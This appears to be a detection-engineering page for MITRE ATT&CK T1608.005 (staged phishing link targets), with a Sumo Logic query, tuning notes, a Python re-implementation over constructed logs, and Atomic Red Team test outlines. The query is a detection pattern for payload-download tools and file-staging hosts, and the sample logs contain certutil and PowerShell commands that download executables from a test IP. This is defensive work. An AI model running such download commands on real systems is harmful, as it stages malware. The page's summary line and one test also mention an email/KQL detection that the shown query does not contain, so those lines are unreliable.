Detect Link Target in Sumo Logic CSE
Adversaries stage resources at link targets that are later delivered to victims via phishing campaigns (T1566.002, T1598.003) or malicious links (T1204.001). Link targets typically include cloned login pages for credential harvesting, malware download pages, or redirect chains through URL shorteners and trusted PaaS platforms. Because this activity occurs on adversary-controlled infrastructure before the victim is targeted, direct detection is impossible from within the victim environment. Detection must focus on downstream indicators: email security telemetry revealing delivered URLs pointing to suspicious infrastructure, endpoint browser telemetry showing user connections to phishing link targets, DNS queries to homoglyph or typosquatted domains, and proxy logs capturing connections to known link-staging platforms such as IPFS gateways, URL shorteners, and cloud PaaS providers abused for redirecting victims.
MITRE ATT&CK
- Tactic: Resource Development
- Technique: T1608 Stage Capabilities
- Sub-technique: T1608.005 Link Target
- Canonical reference: https://attack.mitre.org/techniques/T1608/005/
Sumo Detection Query
_sourceCategory=endpoint/windows OR _sourceCategory=proxy/access
| json auto
| where (process_name in ("curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe") and (command_line matches "*.exe" or command_line matches "*.dll" or command_line matches "*.bin")) or (url matches "*transfer.sh*" or url matches "*paste.ee*" or url matches "*gofile.io*")
| if(process_name matches "*certutil*" and command_line matches "*urlcache*", "High", if(url matches "*transfer.sh*" or url matches "*gofile.io*", "High", "Medium")) as RiskLevel
| count by src_ip, process_name, RiskLevel
| sort by _count desc

Sumo Logic query for T1608.005 detection using source category filters and aggregation. Detects adversary-staged phishing link targets by analyzing delivered email URLs via Microsoft Defen
False Positives & Tuning
- Legitimate marketing emails using URL shorteners (bit.ly, ow.ly) for campaign tracking — common in newsletters and vendor communications
- Internal developer tools and previews legitimately hosted on Netlify, Vercel, or Azure App Services — especially from known SaaS vendors or IT teams
- Security awareness training platforms (KnowBe4, Proofpoint Security Awareness) that intentionally send simulated phishing links through URL shorteners
- IPFS-hosted decentralized applications (dApps), NFT metadata, or legitimate Web3 projects linked in business communications
- SaaS vendor onboarding emails with redirect links through PaaS infrastructure as part of legitimate SSO flows
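The following Python is an added example, not Sumo Logic's code and not part of this detection package. It re-implements the where / if() / count by logic of the query above over a handful of constructed JSON records, so the RiskLevel scoring and the aggregation can be checked outside the SIEM, and it adds a hypothetical allowlist parameter as one way to apply the tuning points listed above (suppressing URL patterns that are approved in your environment). The field names (src_ip, process_name, command_line, url) are taken from the query; the sample records, the IP addresses and the allowlist pattern are constructed for the example.

```python
import fnmatch
import json
from collections import Counter

# Constructed sample records (not real telemetry). Each line is what the
# query's `json auto` stage would parse from an endpoint or proxy event.
SAMPLE_LOGS = [
    '{"_sourceCategory":"endpoint/windows","src_ip":"10.0.0.5","process_name":"certutil.exe",'
    '"command_line":"certutil.exe -urlcache -split -f http://203.0.113.10/update.exe update.exe"}',
    '{"_sourceCategory":"endpoint/windows","src_ip":"10.0.0.5","process_name":"powershell.exe",'
    '"command_line":"powershell.exe -c Invoke-WebRequest http://203.0.113.10/a.dll -OutFile a.dll"}',
    '{"_sourceCategory":"proxy/access","src_ip":"10.0.0.7","url":"https://gofile.io/d/abc123"}',
    '{"_sourceCategory":"proxy/access","src_ip":"10.0.0.7","url":"https://gofile.io/d/def456"}',
    '{"_sourceCategory":"proxy/access","src_ip":"10.0.0.7","url":"https://paste.ee/p/xyz"}',
    # Download tool without a payload-looking argument: the AND clause should not fire.
    '{"_sourceCategory":"endpoint/windows","src_ip":"10.0.0.9","process_name":"wget.exe",'
    '"command_line":"wget.exe https://intranet.example/page.html"}',
    '{"_sourceCategory":"proxy/access","src_ip":"10.0.0.11","url":"https://transfer.sh/get/abc/tool.exe"}',
]

# Literal values from the query's `where` clause and `if()` expression.
DOWNLOAD_TOOLS = {"curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
PAYLOAD_PATTERNS = ("*.exe", "*.dll", "*.bin")
STAGING_HOSTS = ("*transfer.sh*", "*paste.ee*", "*gofile.io*")


def glob_match(value, pattern):
    """Case-insensitive full-string wildcard match, mirroring Sumo's `matches` with * globs."""
    return value is not None and fnmatch.fnmatchcase(value.lower(), pattern.lower())


def matches_query(rec):
    """The `where` clause: (download tool AND payload-like argument) OR staging host in URL."""
    proc = rec.get("process_name")
    cmd = rec.get("command_line")
    url = rec.get("url")
    tool_download = proc in DOWNLOAD_TOOLS and any(glob_match(cmd, p) for p in PAYLOAD_PATTERNS)
    staging_url = any(glob_match(url, p) for p in STAGING_HOSTS)
    return tool_download or staging_url


def risk_level(rec):
    """The nested if() expression that produces the RiskLevel field."""
    if glob_match(rec.get("process_name"), "*certutil*") and glob_match(rec.get("command_line"), "*urlcache*"):
        return "High"
    if glob_match(rec.get("url"), "*transfer.sh*") or glob_match(rec.get("url"), "*gofile.io*"):
        return "High"
    return "Medium"


def run_detection(lines, allowlist=()):
    """Parse, filter, score and aggregate like `count by src_ip, process_name, RiskLevel | sort by _count desc`.

    allowlist (hypothetical tuning knob, not in the original query): URL glob patterns
    that are approved in your environment; matching records are suppressed before scoring.
    """
    counts = Counter()
    for line in lines:
        rec = json.loads(line)
        if not matches_query(rec):
            continue
        if any(glob_match(rec.get("url"), p) for p in allowlist):
            continue
        key = (rec.get("src_ip"), rec.get("process_name"), risk_level(rec))
        counts[key] += 1
    # Highest count first; ties broken deterministically by the key's text.
    return sorted(counts.items(), key=lambda kv: (-kv[1], str(kv[0])))


if __name__ == "__main__":
    for (src_ip, proc, risk), n in run_detection(SAMPLE_LOGS):
        print(f"{n:>3}  {src_ip:<10} {str(proc):<16} {risk}")
```

Running the block as written prints five aggregated rows, with the two gofile.io connections from 10.0.0.7 on top at count 2 and the wget.exe page fetch absent, because neither half of the where clause matches it. Passing allowlist=("*paste.ee*",) as a constructed tuning example drops the paste.ee row and leaves four.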
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Clone Legitimate Login Page for Credential Harvesting Infrastructure
  Expected signal: Linux process audit log (auditd) showing wget execution with --mirror flag and target URL. DNS query for your-test-domain.example.com in DNS server logs. HTTP GET requests in proxy logs originating from the test host. Sysmon EventCode=1 equivalent on Linux (if Sysmon for Linux is deployed) showing the wget process with full command line arguments.
- Test 2: Stage Phishing Link Target on IPFS via Pinata
  Expected signal: Process creation log showing curl execution with api.pinata.cloud as destination. DNS query for api.pinata.cloud. Outbound HTTPS connection in network logs. The returned JSON will contain the IPFS CID (IpfsHash field), which serves as the permanent link target address accessible via https://gateway.pinata.cloud/ipfs/<CID>. When the CID link is later visited, gateway connection logs will show the /ipfs/<CID> path pattern.
- Test 3: Register URL Shortener Redirect to Phishing Page
  Expected signal: Process creation showing curl with api-ssl.bitly.com destination. DNS query for api-ssl.bitly.com. HTTPS POST request in proxy/network logs. The returned JSON contains the 'link' field with the bit.ly short URL. When this URL is subsequently sent in a test phishing email and clicked, email security tools (Defender for Office 365) will record the bit.ly URL in EmailUrlInfo, triggering the main KQL detection with LinkCategory='URLShortener'.
- Test 4: Deploy Phishing Link Target on Azure App Service (PaaS Infrastructure)
  Expected signal: Azure Activity Log entries showing App Service creation and deployment (ResourceProvider: Microsoft.Web). If a user navigates to the *.azurewebsites.net URL, DeviceNetworkEvents shows the browser connection with RemoteUrl containing 'azurewebsites.net'. Azure Monitor logs capture all access to the App Service, including source IPs, user agents, and request paths.
References
- https://attack.mitre.org/techniques/T1608/005/
- https://blog.talosintelligence.com/ipfs-abuse/
- https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection
- https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service
- https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/
- https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian
- https://www.kaspersky.com/blog/malicious-redirect-methods/50045/
- https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
- https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/
- https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailurlinfo-table
- https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table